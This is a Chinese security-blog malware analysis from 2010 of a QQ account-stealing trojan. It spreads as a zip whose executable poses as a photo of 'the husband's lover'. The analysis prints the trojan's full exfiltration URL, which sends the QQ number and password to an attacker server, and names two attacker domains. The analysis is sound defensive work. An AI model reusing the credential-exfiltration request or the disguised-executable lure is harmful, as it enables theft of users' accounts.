热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全

分析QQ盗号木马 之 “老公的情人”

发布时间:2010-12-31 11:57文章来源:网络文章作者:孤客持情剑 点击次数:
摘要:看到老公的情人.zip 菊花不由一紧,想起之前的我的照片和最近的我的最新照片,可谓是异曲同工,难道真的色字当头一把刀? 1 拿到样本首先看到的是老公的情人,猜测接下来是scr还是exe,结果是相片双击打开.exe(这个兄弟长了一幅jpg的面目,相信会有不少兄弟...

看到老公的情人.zip 菊花不由一紧,想起之前的我的照片和最近的我的最新照片,可谓是异曲同工,难道真的色字当头一把刀?

 

1 拿到样本首先看到的是老公的情人,猜测接下来是scr还是exe,结果是相片双击打开··.exe(这个兄弟长了一幅jpg的面目,相信会有不少兄弟忍不住诱惑双击点击之)

 

盗号木马分析

2 既然是QQ盗号木马,当然需要盗取你的QQ账号密码了,貌似有监控你输入的QQ账号信息,然后发送到黑客服务器,偶的这个例子里账号是fuckyou2010,密码是cao,发送的黑客服务器是web0622155.w201.dns558.com,貌似还有一个黑客服务器是www.qq588888.com

http://web0622155.w201.dns558.com/1/102g/qq14.asp?QQNumber=fuckyou2010&QQPassWord=cao

盗号木马分析2

 

3 使用字符大法瞄了下貌似这厮还可能有一些操作。

(1)难道会收集一些所谓的QQ安全登录器生成的账号信息?(我测试了一下貌似没看到它上报到服务器,可能是我的QQ版本的问题)

        命令:"QQ安装路径QQ.exe" /START QQUIN:QQ号 PWDHASH:加密的密码 /STAT:登陆状态(10或40) 

(2)还有看到一些可能是webQQ的相关信息

       URL=tencent://message/?uin

       URL=tencent://AddPortal/?Menu=Yes&Exe=QQ&PanelID

      .....

标签分类: 反木马

上一篇:iframe网站挂马的解决方案
下一篇:手动降低IE权限 防范网马